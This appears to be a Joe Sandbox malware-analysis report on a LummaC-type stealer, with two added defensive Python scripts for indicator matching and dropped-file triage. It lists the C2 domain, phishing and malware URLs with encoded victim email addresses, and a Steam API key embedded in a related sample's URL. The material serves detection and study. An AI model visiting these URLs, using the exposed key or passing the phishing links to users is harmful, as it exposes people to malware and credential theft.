                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://store.steampowered.com/yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://www.certum.pl/CPS0yTRd6nkLWV.exefalse
                                                                                                                                                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
162.125.66.18 | www-env.dropbox-dns.com | United States | 19679 | DROPBOX, US | false
188.114.96.3 | aleksandr-block.com | European Union | 13335 | CLOUDFLARENET, US | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-AS, US | false
162.125.66.15 | edge-block-www-env.dropbox-dns.com | United States | 19679 | DROPBOX, US | false
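The IP table marks only aleksandr-block.com (188.114.96.3) as malicious; the Dropbox and Akamai rows are not flagged, and the similar-samples list further down matches on the Dropbox address 162.125.66.18, which unrelated samples (documents, an .eml) also contact. The C2 host sits behind Cloudflare, so its IP is shared with many benign sites and is not a usable indicator on its own. The following script is an added example written for this page (it is not Joe Sandbox's code or output format): it turns the IP table into indicators, keeps IPs only for non-shared infrastructure, and runs the result over constructed DNS and proxy log lines. The shared-infrastructure ASN set and the log format are assumptions of the example.

```python
import re

# Rows transcribed from the report's IP table above (values are the page's
# own; the dict layout is this example's, not Joe Sandbox's export format).
REPORT_IPS = [
    {"ip": "162.125.66.18", "domain": "www-env.dropbox-dns.com",
     "asn": 19679, "asn_name": "DROPBOX", "malicious": False},
    {"ip": "188.114.96.3", "domain": "aleksandr-block.com",
     "asn": 13335, "asn_name": "CLOUDFLARENET", "malicious": True},
    {"ip": "104.102.49.254", "domain": "steamcommunity.com",
     "asn": 16625, "asn_name": "AKAMAI-AS", "malicious": False},
    {"ip": "162.125.66.15", "domain": "edge-block-www-env.dropbox-dns.com",
     "asn": 19679, "asn_name": "DROPBOX", "malicious": False},
]

# ASNs whose addresses front many unrelated tenants (Cloudflare, Akamai,
# Dropbox). An IP hit there is not attributable to this sample; only the
# hostname is. This set is the editor's assumption, not part of the report.
SHARED_INFRA_ASNS = {13335, 16625, 19679}


def build_iocs(rows):
    """Return (domain_iocs, ip_iocs) from report rows.

    Only rows the sandbox marked malicious are used, and for shared
    infrastructure the IP is deliberately dropped so that a CDN/anycast
    address shared with benign sites never becomes a block-list entry.
    """
    domains, ips = set(), set()
    for row in rows:
        if not row["malicious"]:
            continue
        domains.add(row["domain"].lower().rstrip("."))
        if row["asn"] not in SHARED_INFRA_ASNS:
            ips.add(row["ip"])
    return domains, ips


# Constructed DNS and proxy log lines (not from the report). Line 5 resolves
# an unrelated name to the same Cloudflare address as the C2 and must not alert.
SAMPLE_LOGS = """\
2025-01-14T07:55:30Z dns client=10.0.0.5 query=aleksandr-block.com type=A answer=188.114.96.3
2025-01-14T07:55:31Z proxy client=10.0.0.5 method=POST host=aleksandr-block.com path=/Q status=200
2025-01-14T07:55:32Z proxy client=10.0.0.7 method=GET host=steamcommunity.com path=/workshop/ status=200
2025-01-14T07:55:33Z proxy client=10.0.0.9 method=GET host=www.dropbox.com path=/static/api/ status=200
2025-01-14T07:56:01Z dns client=10.0.0.11 query=cdn.example.org type=A answer=188.114.96.3
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


def _domain_hit(name, domains):
    """Exact or parent-domain match, so sub.aleksandr-block.com also hits."""
    return any(name == d or name.endswith("." + d) for d in domains)


def match_logs(log_text, domains, ips):
    """Return [(line_no, reason)] for lines hitting a domain IOC, or an IP IOC
    when the IP was kept (i.e. it is not shared infrastructure)."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        fields = dict(KV_RE.findall(line))
        name = (fields.get("host") or fields.get("query") or "").lower().rstrip(".")
        if name and _domain_hit(name, domains):
            hits.append((n, f"domain IOC {name}"))
            continue
        answer = fields.get("answer")
        if answer in ips:
            hits.append((n, f"ip IOC {answer}"))
    return hits


if __name__ == "__main__":
    domain_iocs, ip_iocs = build_iocs(REPORT_IPS)
    print("domain IOCs:", sorted(domain_iocs), "ip IOCs:", sorted(ip_iocs))
    for line_no, reason in match_logs(SAMPLE_LOGS, domain_iocs, ip_iocs):
        print(f"line {line_no}: {reason}")
```

Run against the constructed log, only the two aleksandr-block.com lines alert; the steamcommunity.com and www.dropbox.com requests and the unrelated name that happens to resolve to 188.114.96.3 do not. If the same sample were instead seen contacting a host on a single-tenant ASN, the IP would be kept and would match DNS answers on its own.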
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1590540
Start date and time: 2025-01-14 08:54:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: yTRd6nkLWV.exe (renamed because the original name is a hash value)
Original Sample Name: 276b08cdfcba38b36290db8a3162df343ba0f2bc3d3e48d22928ae61480b8183.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/2@12/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target yTRd6nkLWV.exe, PID 7532 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data
Time | Type | Description
02:55:28 | API Interceptor | 11x Sleep call for process: yTRd6nkLWV.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
162.125.66.18 | k7h8uufe6Y.exe | Get hash | malicious | LummaC | Browse |
162.125.66.18 | SDIO_R773.exe | Get hash | malicious | LummaC | Browse |
162.125.66.18 | Message.eml | Get hash | malicious | Unknown | Browse |
162.125.66.18 | https://docsend.com/view/sutbz9ibkqcisjtv | Get hash | malicious | Unknown | Browse |
162.125.66.18 | Jeffparish.docx | Get hash | malicious | Unknown | Browse |
162.125.66.18 | Remittance details.docx | Get hash | malicious | Unknown | Browse |
162.125.66.18 | Remittance details.docx | Get hash | malicious | Unknown | Browse |
162.125.66.18 | universityform.xlsm | Get hash | malicious | Unknown | Browse |
162.125.66.18 | universityform.xlsm | Get hash | malicious | Unknown | Browse |
162.125.66.18 | universityform.xlsm | Get hash | malicious | Unknown | Browse |
188.114.96.3 | New Order#12125.exe | Get hash | malicious | FormBook | Browse | www.cifasnc.info/8rr3/
188.114.96.3 | CSZ inquiry for MH raw material.exe | Get hash | malicious | FormBook | Browse | www.cifasnc.info/8rr3/
188.114.96.3 | 1001-13.exe | Get hash | malicious | FormBook | Browse | www.einpisalpace.shop/pgw3/
188.114.96.3 | trow.exe | Get hash | malicious | Unknown | Browse | www.tc17.com/
188.114.96.3 | HN1GiQ5tF7.exe | Get hash | malicious | FormBook | Browse | www.questmatch.pro/ipd6/
188.114.96.3 | AxKxwW9WGa.exe | Get hash | malicious | FormBook | Browse | www.zkdamdjj.shop/kf1m/
188.114.96.3 | XeFYBYYj0w.exe | Get hash | malicious | FormBook | Browse | www.einpisalpace.shop/8g74/?wtE0B=1LjxZz&9F=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO
188.114.96.3 | tfWjjV1LdT.exe | Get hash | malicious | FormBook | Browse | www.zkdamdjj.shop/kf1m/
188.114.96.3 | M7XS5C07kV.exe | Get hash | malicious | FormBook | Browse | www.zkdamdjj.shop/kf1m/
188.114.96.3 | https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t | Get hash | malicious | HTMLPhisher | Browse | cocteldedeas.mx/rx567/
104.102.49.254 | r4xiHKy8aM.exe | Get hash | malicious | Socks5Systemz | Browse | /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | Get hash | malicious | Unknown | Browse | www.valvesoftware.com/legal.htm
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
s-part-0017.t-0009.t-msedge.net | 009.vbe | Get hash | malicious | AgentTesla | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ== | Get hash | malicious | EvilProxy, HTMLPhisher | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://iyztciuamr.cfolks.pl/pp | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://precheckcar.com/wp-admin/common/oauth2/v2.0/authorize/?client_id=f01f3e6e-ddd5-44393-8b7f-1e5d6348b58a | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://precheckcar.com/wp-admin/ | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://offfryfjtht767755433.webflow.io/ | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://ipfs.fleek.co/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/ | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://bitvavo.debak.nl/signin-oidc | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.google.ca/url?b21dp0=https://www.reillyreevesandhorton.edu&TA=DQ&TA=5E&bg=OW&TA=E7&TA=TV&q=%2561%256d%2570%2F%2568%256D%2539%2569%2531%2539%252E%2564%2565%256B%2563%2568%256F%2562%2574%2569%2565%2577%252E%2563%256F%256D%252F%2566%2569%256E%2561%256E%2563%2565%2540%2563%256F%256E%2564%2565%256E%2561%2573%2574%252E%2563%256F%256D&opdg=NTk&NXk=Zng&Q1k=R0g | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.45
edge-block-www-env.dropbox-dns.com | k7h8uufe6Y.exe | Get hash | malicious | LummaC | Browse | 162.125.66.15
edge-block-www-env.dropbox-dns.com | SDIO_R773.exe | Get hash | malicious | LummaC | Browse | 162.125.66.15
edge-block-www-env.dropbox-dns.com | vEtDFkAZjO.exe | Get hash | malicious | RL STEALER, StormKitty | Browse | 162.125.66.15
edge-block-www-env.dropbox-dns.com | hnskdfgjgar22.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.65.15
edge-block-www-env.dropbox-dns.com | Setup.exe | Get hash | malicious | Unknown | Browse | 162.125.69.15
edge-block-www-env.dropbox-dns.com | Setup.exe | Get hash | malicious | Unknown | Browse | 162.125.69.15
edge-block-www-env.dropbox-dns.com | hnsadjhfg18De.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.15
edge-block-www-env.dropbox-dns.com | De17De16.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.15
edge-block-www-env.dropbox-dns.com | fghdsdf17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.15
edge-block-www-env.dropbox-dns.com | hnghksdjfhs19De.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 162.125.69.15
steamcommunity.com | k7h8uufe6Y.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | G7T8lHJWWM.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | 92.255.57_2.112.ps1 | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | uo9m.exe | Get hash | malicious | LummaC | Browse | 23.197.127.21
steamcommunity.com | uo9m.exe | Get hash | malicious | LummaC | Browse | 23.50.98.133
steamcommunity.com | L7GNkeVm5e.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | NDWffRLk7z.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | g3toRYa6JE.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | lBb4XI4eGD.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | UWYXurYZ2x.exe | Get hash | malicious | LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer | Browse | 104.102.49.254
aleksandr-block.com | k7h8uufe6Y.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
aleksandr-block.com | 92.255.57_2.112.ps1 | Get hash | malicious | LummaC | Browse | 188.114.96.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
DROPBOXUS | k7h8uufe6Y.exe | Get hash | malicious | LummaC | Browse | 162.125.66.15
DROPBOXUS | SDIO_R773.exe | Get hash | malicious | LummaC | Browse | 162.125.66.15
DROPBOXUS | Message.eml | Get hash | malicious | Unknown | Browse | 162.125.1.20
DROPBOXUS | https://docsend.com/view/sutbz9ibkqcisjtv | Get hash | malicious | Unknown | Browse | 162.125.66.18
DROPBOXUS | Jeffparish.docx | Get hash | malicious | Unknown | Browse | 162.125.66.18
DROPBOXUS | sEG2xXpg0X.xlsm | Get hash | malicious | Unknown | Browse | 162.125.3.18
DROPBOXUS | Remittance details.docx | Get hash | malicious | Unknown | Browse |
                                                                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                                                                  Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                                                                  vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                                                                  universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                                                                  CLOUDFLARENETUSk7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                                                  009.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                  • 104.26.12.205
                                                                                                                                                                                                                                                  possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.18.69.40
                                                                                                                                                                                                                                                  92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                                                  phishing.emlGet hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                  • 104.21.16.1
                                                                                                                                                                                                                                                  https://tinyurl.com/286oc4lyGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.17.112.233
                                                                                                                                                                                                                                                  http://hotpepperliberia.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 172.67.130.110
                                                                                                                                                                                                                                                  https://email.lc.haxconsulting.com/c/eJx0k0tv4zgQhH-NdBk4kKgHrQMPdhI5mck78djJRaDIlsSYD4WkpLF__cJOsLvAZq_FLnbhQzWrBCdJS6-fh9_RaK9H9Muk6c9yE3LCCkjrLORGUaGJZGcd_cOMdoP0QrdnzKivt8pMGqzrRF_5fQ-EtqDZvqLOiVYDD4HEOMnxvMB5EoKiQlYKnKMtHLdv5i83BT5n4-tb-75JAbPHy6-p02-Mqp6KVv9LO9pyPE9ZwVKaZjlkgBjkRVEjHIIehTVagfakt4YPzAujw45EeRrF0RziBvIoyeskRxgwwlma0ajAPBQERSiL4jg55o2Ss2YOOYWszps4a5o6CtLoWwySdN73LkgWASoDVE7T9N-pAJXcTFoaymeOSmr3s3YQHGYDhSApG2GdrzRVECQXdyBkgHJJ_5GuqNsJ7QKUnzgEyYUGIbsvNY0644_656a874w-uqIs-lGk6Q-UFjiUrPpkKLQHq6kka1Q6vvq928YBWm7z65vVxHE3FgEq59i-jvvVs0xEw7L6_MK2IhvbP_TKJn77qF7k3TSixbC_V5cBWuI33j_fivpGtZOAqN0Zxga7eJCXr-uXzfMHlIcjgANevhv8USfN_ZM-L_Dhoeu38GTXt4sALYfFzheHl3LNy1VZjw8iQOU6QOWmvb3vrqbc9Y17WtynH9OVVkrF8qdedwDgHtt4eTkPpTn1ebm6Sd7eV-rWxvS93979kt02VOA7wwntRWisaIUm9SB3sxOQsLdmFBwskUA5M1oD88aGlvwv49CZwTIgJ_9MuHE2GbsDG3pyTPFtBE-YUdW31-YJ-Orvpo8E_RUAAP__dHE7QwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.17.113.39
                                                                                                                                                                                                                                                  http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                                                                                                                  • 172.67.74.152
                                                                                                                                                                                                                                                  AKAMAI-ASUSXhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  G7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.47.168.24
                                                                                                                                                                                                                                                  92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                  • 2.19.126.80
                                                                                                                                                                                                                                                  https://staemcomnunlty.com/glft/91832Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 2.19.126.91
                                                                                                                                                                                                                                                  https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                  • 2.19.126.83
                                                                                                                                                                                                                                                  uo9m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.50.98.133
                                                                                                                                                                                                                                                  https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcTGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                  • 2.19.126.84
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | XhlpAnBmIk.exe | malicious | LummaC | 104.102.49.254; 162.125.66.18; 162.125.66.15; 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | k7h8uufe6Y.exe | malicious | LummaC | 104.102.49.254; 162.125.66.18; 162.125.66.15; 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | G7T8lHJWWM.exe | malicious | LummaC | 104.102.49.254; 162.125.66.18; 162.125.66.15; 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | 92.255.57_2.112.ps1 | malicious | LummaC | 104.102.49.254; 162.125.66.18; 162.125.66.15; 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | 8e8JUOzOjR.exe | malicious | DBatLoader | 104.102.49.254; 162.125.66.18; 162.125.66.15; 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | UTstKgkJNY.exe | malicious | DBatLoader | 104.102.49.254; 162.125.66.18; 162.125.66.15; 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | On9ahUpI4R.exe | malicious | DBatLoader | 104.102.49.254; 162.125.66.18; 162.125.66.15; 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | JDQS879kiy.exe | malicious | DBatLoader | 104.102.49.254; 162.125.66.18; 162.125.66.15; 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | UAHIzSm2x2.exe | malicious | DBatLoader | 104.102.49.254; 162.125.66.18; 162.125.66.15; 188.114.96.3
                                                                                                                                                                                                                                                  LbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (410)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1005
                                                                                                                                                                                                                                                  Entropy (8bit):4.9698836036542575
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:hYjkspFAunWDg5+DCpdgc6olL3lX8YDUdwlKXG/PEuXW:4plVl68lL14
                                                                                                                                                                                                                                                  MD5:1E8AC4ADD8592CABAA50DFB8581608D2
                                                                                                                                                                                                                                                  SHA1:EBE49951ACE4227AB233D9FD6218A9D8907118B8
                                                                                                                                                                                                                                                  SHA-256:83622A0678D9F991CE9E6F9F2690A93504E2FC58128156C4C4B2358B372572ED
                                                                                                                                                                                                                                                  SHA-512:8A3F7BADCF10D38D9545174651CDE383F5C035578C9D3D451DB2FFF8CC73907582EA1B233BB9F68FA988B5D615A601ECB12ECC735D7645725A7F489AB5A15696
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">.<meta name="viewport" content="width=device-width, initial-scale=1" />.<title>Dropbox - 400</title>.<link href="https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css" rel="stylesheet" type="text/css"/>.<link rel="shortcut icon" href="https://cfl.dropboxstatic.com/static/images/favicon.ico"/>.</head>.<body>.<div class="figure">.<img src="https://assets.dropbox.com/www/en-us/illustrations/spot/target-miss.svg" alt="Error: 400"/>.</div>.<div id="errorbox">.<h1>Error (400)</h1>Something went wrong. Don't worry, your files are still safe and the Dropbox team has been notified. Check out our <a href="https://status.dropbox.com">Status Page</a> to see if there is a known incident, our <a href="https://www.dropbox.com/help">Help Center</a> and <a href="https://forums.dropbox.com">forums</a> for help, or head back to <a href="https://www.dropbox.com/home">home</a>..</div>..</body>.</h
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                  Entropy (8bit):4.413935255530653
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:ocifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNb5+:di58oSWIZBk2MM6AFBZo
                                                                                                                                                                                                                                                  MD5:73156EEF4D7767BFB20B541048BE065E
                                                                                                                                                                                                                                                  SHA1:5447AA8C3C66601BD25F2C3A222B068EBAAE5BA9
                                                                                                                                                                                                                                                  SHA-256:35DDD1CE8C9AFE6DCBE0277C9BFB9E38B7A575B694DAC73AA66A8CE4A3F64E4A
                                                                                                                                                                                                                                                  SHA-512:E414BB7ECFA1BFA4CCA2663D330DA6A824BA9B255FE49E0F3993EE634265B7868C179D6AF86FE367C4E03F1312A510E345D75A9D25191091444B3BA325B323DB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...=bf..............................................................................................................................................................................................................................................................................................................................................r...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
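The two dropped files above are the security-relevant pair in this section: the process wrote an Amcache hive copy and a Dropbox "Error (400)" page, the latter being what the report's "Creates HTML files with .exe extension (expired dropper behavior)" signature refers to (a next-stage download that returned an error page and was still written to disk). The following is an added example, not code from the Joe Sandbox report or from the sample: it reproduces the report's File Type and Entropy triage from magic bytes and flags an extension/content mismatch. The inputs are constructed stand-ins for the dropped files, and the name `stage2.exe` is an assumption; the report does not give the on-disk name of the dropped HTML.

```python
# Added example, not part of the Joe Sandbox report or the sample itself:
# triage a dropped file the way the report's "File Type" / "Entropy" fields
# do, and flag the "HTML file with .exe extension" case, i.e. a next-stage
# fetch that returned an error page and was still written to disk.
import math
from collections import Counter

# (signature, human name, compare case-insensitively after leading whitespace)
MAGIC = [
    (b"MZ", "PE executable", False),
    (b"regf", "Windows registry hive", False),
    (b"<!DOCTYPE html", "HTML document", True),
    (b"<html", "HTML document", True),
]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits/byte: 0.0 for a constant file, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def identify(data: bytes) -> str:
    """Classify by leading bytes; text signatures tolerate a whitespace prefix and any case."""
    head = data[:64]
    text_head = head.lstrip().lower()
    for sig, name, is_text in MAGIC:
        if is_text and text_head.startswith(sig.lower()):
            return name
        if not is_text and head.startswith(sig):
            return name
    return "unknown"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the name claims a PE (.exe/.dll/.scr) but the bytes are not one, or the reverse."""
    claims_pe = filename.lower().endswith((".exe", ".dll", ".scr"))
    is_pe = identify(data) == "PE executable"
    return claims_pe != is_pe


def triage(filename: str, data: bytes) -> dict:
    """Summary in the shape of the report's dropped-file entry, plus the mismatch verdict."""
    return {
        "name": filename,
        "type": identify(data),
        "size": len(data),
        "entropy": round(shannon_entropy(data), 4),
        "extension_mismatch": extension_mismatch(filename, data),
    }


# Constructed inputs (not the real dropped files): a cut-down Dropbox 400 page
# and a zero-filled buffer carrying the regf hive signature.
DROPBOX_400 = (
    b"<!DOCTYPE html>\n<html>\n<head><title>Dropbox - 400</title></head>\n"
    b"<body><h1>Error (400)</h1>Something went wrong.</body></html>\n"
)
FAKE_HIVE = b"regf" + bytes(4092)

if __name__ == "__main__":
    # "stage2.exe" is an assumed name; the report does not state the dropped file's name.
    for name, blob in [("stage2.exe", DROPBOX_400), ("Amcache.hve", FAKE_HIVE)]:
        print(triage(name, blob))
```

The mismatch check is the part worth keeping in a triage script: a loader that writes whatever an HTTP fetch returned to `<name>.exe` and then tries to execute it leaves exactly this artifact behind when the hosting link has been taken down, and the low entropy (the report lists 4.97 for a 1005-byte HTML file) is a second hint that the blob is text rather than a packed PE.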
                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):6.9594791382062615
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                                                                                                                                  • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                                                                                                                  • Inno Setup installer (109748/4) 1.07%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                  File name:yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  File size:1'625'936 bytes
                                                                                                                                                                                                                                                  MD5:d71663e0a0164a482c1ffc9d2c06539f
                                                                                                                                                                                                                                                  SHA1:25030448b108c3b50fcba933dd7b472d3570dbf4
